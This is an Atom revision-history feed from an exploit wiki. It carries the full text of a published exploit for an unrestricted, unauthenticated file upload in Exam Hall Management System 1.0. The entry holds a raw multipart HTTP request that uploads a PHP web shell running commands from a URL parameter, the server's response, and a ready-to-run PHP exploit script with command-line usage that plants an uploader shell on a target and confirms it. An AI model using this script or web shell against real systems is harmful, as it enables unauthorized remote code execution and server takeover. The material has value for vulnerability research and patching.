<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Exam_Hall_Management_System_1.0_%E7%84%A1%E9%99%90%E5%88%B6%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E</id>
	<title>Exam Hall Management System 1.0 無限制文件上傳漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Exam_Hall_Management_System_1.0_%E7%84%A1%E9%99%90%E5%88%B6%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Exam_Hall_Management_System_1.0_%E7%84%A1%E9%99%90%E5%88%B6%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T14:30:44Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Exam_Hall_Management_System_1.0_%E7%84%A1%E9%99%90%E5%88%B6%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;diff=6430&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;&lt;pre&gt; # Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) # Date: 06/07/2021 # Exploit Author: Thamer Almohammadi (@Thamerz88) # Vend...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Exam_Hall_Management_System_1.0_%E7%84%A1%E9%99%90%E5%88%B6%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&amp;diff=6430&amp;oldid=prev"/>
		<updated>2021-07-07T02:56:04Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;&amp;lt;pre&amp;gt; # Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) # Date: 06/07/2021 # Exploit Author: Thamer Almohammadi (@Thamerz88) # Vend...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)&lt;br /&gt;
# Date: 06/07/2021&lt;br /&gt;
# Exploit Author: Thamer Almohammadi (@Thamerz88)&lt;br /&gt;
# Vendor Homepage: https://www.sourcecodester.com&lt;br /&gt;
# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Tested on: Kali Linux&lt;br /&gt;
&lt;br /&gt;
# Proof of Concept :&lt;br /&gt;
&lt;br /&gt;
1- Send Request to /pages/save_user.php.&lt;br /&gt;
2- Find your shell.php file path and try any command.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
################################## REQUEST ###############################&lt;br /&gt;
POST /pages/save_user.php HTTP/1.1&lt;br /&gt;
Host: localhost&lt;br /&gt;
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&lt;br /&gt;
Accept-Language: en-US,en;q=0.5&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877&lt;br /&gt;
Content-Length: 369&lt;br /&gt;
-----------------------------3767690350396265302394702877&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;image&amp;quot;; filename=&amp;quot;shell.php&amp;quot;&lt;br /&gt;
Content-Type: application/x-php&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
&lt;br /&gt;
system($_GET['cmd']);&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
-----------------------------3767690350396265302394702877&lt;br /&gt;
&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;btn_save&amp;quot;&lt;br /&gt;
&lt;br /&gt;
-----------------------------3767690350396265302394702877--&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
################################## RESPONSE #############################&lt;br /&gt;
HTTP/1.1 200 OK&lt;br /&gt;
Date: Tue, 06 Jul 2021 02:16:18 GMT&lt;br /&gt;
Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1&lt;br /&gt;
X-Powered-By: PHP/7.3.28&lt;br /&gt;
Content-Length: 1529&lt;br /&gt;
Connection: close&lt;br /&gt;
Content-Type: text/html; charset=UTF-8&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
################################## Exploit #############################&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
// Coder By Thamer Almohammadi(@Thamerz88);&lt;br /&gt;
function exploit($scheme,$host,$path,$shell){&lt;br /&gt;
    $url=$scheme.&amp;quot;://&amp;quot;.$host.$path;&lt;br /&gt;
    $content='&amp;lt;form enctype=&amp;quot;multipart/form-data&amp;quot; method=&amp;quot;POST&amp;quot;&amp;gt;&amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;MAX_FILE_SIZE&amp;quot; value=&amp;quot;512000&amp;quot; /&amp;gt;File To Upload : &amp;lt;input name=&amp;quot;userfile&amp;quot; type=&amp;quot;file&amp;quot; /&amp;gt;&amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Upload&amp;quot;/&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;?php $uploaddir = getcwd ().&amp;quot;/&amp;quot;;$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo &amp;quot;File was successfully uploaded.&amp;lt;/br&amp;gt;&amp;quot;;}else{echo &amp;quot;Upload failed&amp;quot;;}?&amp;gt;';&lt;br /&gt;
    $data    = &amp;quot;-----------------------------3767690350396265302394702877\r\n&amp;quot;;&lt;br /&gt;
    $data   .= &amp;quot;Content-Disposition: form-data; name=\&amp;quot;image\&amp;quot;; filename=\&amp;quot;$shell\&amp;quot;\r\n&amp;quot;;&lt;br /&gt;
    $data   .= &amp;quot;Content-Type: image/gif\r\n\r\n&amp;quot;;&lt;br /&gt;
    $data   .= &amp;quot;$content\r\n&amp;quot;;&lt;br /&gt;
    $data   .= &amp;quot;-----------------------------3767690350396265302394702877\r\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
    $data    .= &amp;quot;-----------------------------3767690350396265302394702877\r\n&amp;quot;;&lt;br /&gt;
    $data   .= &amp;quot;Content-Disposition: form-data; name=\&amp;quot;btn_save\&amp;quot;\r\n\r\n&amp;quot;;&lt;br /&gt;
    $data   .= &amp;quot;\r\n&amp;quot;;&lt;br /&gt;
    $data   .= &amp;quot;-----------------------------3767690350396265302394702877\r\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
    $packet = &amp;quot;POST $path/pages/save_user.php HTTP/1.0\r\n&amp;quot;;&lt;br /&gt;
    $packet .= &amp;quot;Host: $host\r\n&amp;quot;;&lt;br /&gt;
    $packet .= &amp;quot;User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n&amp;quot;;&lt;br /&gt;
    $packet .= &amp;quot;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n&amp;quot;;&lt;br /&gt;
    $packet .= &amp;quot;Accept-Language: en-us,en;q=0.5\r\n&amp;quot;;&lt;br /&gt;
    $packet .= &amp;quot;Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n&amp;quot;;&lt;br /&gt;
    $packet .= &amp;quot;Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n&amp;quot;;&lt;br /&gt;
    $packet .= &amp;quot;Content-Length: &amp;quot;.strlen ($data).&amp;quot;\r\n\r\n\r\n&amp;quot;;&lt;br /&gt;
    $packet .= $data;&lt;br /&gt;
    $packet .= &amp;quot;\r\n&amp;quot;;&lt;br /&gt;
    send($host, $packet);&lt;br /&gt;
    sleep(2);&lt;br /&gt;
    check($url,$shell);&lt;br /&gt;
}&lt;br /&gt;
function send($host, $packet)&lt;br /&gt;
{&lt;br /&gt;
        if ($connect = @fsockopen ($host, 80, $x, $y, 3))&lt;br /&gt;
        {&lt;br /&gt;
                @fputs ($connect, $packet);&lt;br /&gt;
                @fclose ($connect);&lt;br /&gt;
        }&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
function check($url,$shell){&lt;br /&gt;
    $check=file_get_contents($url.&amp;quot;/uploadImage/Profile/&amp;quot;.$shell);&lt;br /&gt;
    $preg=preg_match('/(File To Upload)/', $check, $output);&lt;br /&gt;
    if($output[0] == &amp;quot;File To Upload&amp;quot;){&lt;br /&gt;
        echo &amp;quot;[+] Upload shell successfully.. :D\n&amp;quot;; &lt;br /&gt;
        echo &amp;quot;[+] Link &amp;quot;. $url.&amp;quot;/uploadImage/Profile/&amp;quot;.$shell.&amp;quot;\n&amp;quot;; &lt;br /&gt;
        }&lt;br /&gt;
    else{ //Exploit Failed&lt;br /&gt;
        echo &amp;quot;[-] Exploit Failed..\n&amp;quot;; &lt;br /&gt;
    }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
$options=getopt(&amp;quot;u:s:&amp;quot;);&lt;br /&gt;
if(!isset($options['u'], $options['s'])) &lt;br /&gt;
die(&amp;quot;\n [+] Simple Exploiter Exam Hall Management System by T3ster \n [+] Usage : php exploit.php -u http://target.com -s shell.php\n &lt;br /&gt;
-u http://target.com   = Target URL ..&lt;br /&gt;
-s shell.php           = Shell Name ..\n\n&amp;quot;);  &lt;br /&gt;
$url=$options[&amp;quot;u&amp;quot;];&lt;br /&gt;
$shell=$options[&amp;quot;s&amp;quot;];&lt;br /&gt;
$parse=parse_url($url);&lt;br /&gt;
$host=$parse['host'];&lt;br /&gt;
$path=$parse['path'];&lt;br /&gt;
$scheme=$parse['scheme'];&lt;br /&gt;
exploit($scheme,$host,$path,$shell);&lt;br /&gt;
&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>